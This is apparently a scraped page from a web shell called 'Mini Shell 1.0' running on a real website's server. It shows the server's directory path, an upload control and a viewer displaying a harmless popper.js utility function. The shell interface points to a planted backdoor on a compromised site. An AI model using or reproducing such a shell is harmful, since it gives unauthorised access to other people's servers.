HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/negocios.lapieza.do/node_modules/@popperjs/core/lib/utils/
Upload File :
Current File : /var/www/negocios.lapieza.do/node_modules/@popperjs/core/lib/utils/getAltAxis.js.flow
// @flow

export default function getAltAxis(axis: 'x' | 'y'): 'x' | 'y' {
  return axis === 'x' ? 'y' : 'x';
}